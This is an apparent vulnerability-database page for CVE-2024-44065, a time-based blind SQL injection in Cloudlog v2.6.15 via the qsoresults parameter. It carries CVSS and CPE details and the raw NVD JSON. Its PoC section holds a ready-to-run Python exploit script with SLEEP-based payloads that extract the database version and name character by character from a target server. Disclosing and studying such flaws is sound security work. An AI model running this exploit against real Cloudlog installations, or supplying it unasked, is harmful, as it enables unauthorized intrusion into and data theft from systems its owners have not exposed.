Security Vulnerability Report
中文
CVE-2024-44065 CVSS 9.8 CRITICAL

CVE-2024-44065

Published: 2025-12-26 17:15:43
Last Modified: 2025-12-31 21:35:08

Description

Time-based blind SQL Injection vulnerability in Cloudlog v2.6.15 at the endpoint /index.php/logbookadvanced/search in the qsoresults parameter.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:magicbug:cloudlog:2.6.15:*:*:*:*:*:*:* - VULNERABLE
Cloudlog < 2.6.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time # CVE-2024-44065 Time-based Blind SQL Injection PoC # Target: Cloudlog v2.6.15 # Endpoint: /index.php/logbookadvanced/search # Vulnerable Parameter: qsoresults TARGET_URL = "http://target-server/index.php/logbookadvanced/search" def check_sqli(payload): """Send payload and check response time""" start_time = time.time() data = {"qsoresults": payload} try: response = requests.post(TARGET_URL, data=data, timeout=30) elapsed = time.time() - start_time return elapsed > 5 # True if SLEEP(5) was executed except: return False def extract_db_version(): """Extract database version using blind SQL injection""" payload = "1' AND (SELECT CASE WHEN (SUBSTRING(@@version,1,1)='5') THEN SLEEP(5) ELSE 0 END) AND '1'='1" if check_sqli(payload): return "MySQL 5.x" return "Unknown" def extract_database_name(): """Extract current database name character by character""" db_name = "" for pos in range(1, 20): for char in range(32, 127): payload = f"1' AND (SELECT CASE WHEN (ASCII(SUBSTRING(database(),{pos},1))={char}) THEN SLEEP(5) ELSE 0 END) AND '1'='1" if check_sqli(payload): db_name += chr(char) print(f"[*] Database name: {db_name}") break return db_name if __name__ == "__main__": print("[*] CVE-2024-44065 PoC - Cloudlog SQL Injection") print(f"[*] Target: {TARGET_URL}") version = extract_db_version() print(f"[*] Database Version: {version}") db_name = extract_database_name() print(f"[!] Extracted Database: {db_name}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-44065", "sourceIdentifier": "[email protected]", "published": "2025-12-26T17:15:42.527", "lastModified": "2025-12-31T21:35:07.857", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Time-based blind SQL Injection vulnerability in Cloudlog v2.6.15 at the endpoint /index.php/logbookadvanced/search in the qsoresults parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:magicbug:cloudlog:2.6.15:*:*:*:*:*:*:*", "matchCriteriaId": "D4E30153-EF1D-44A1-87F3-803F895BC6BC"}]}]}], "references": [{"url": "https://github.com/jacopo1223/jacopo.github/tree/main/CVE-2024-44065", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/magicbug/Cloudlog", "source": "[email protected]", "tags": ["Product"]}]}}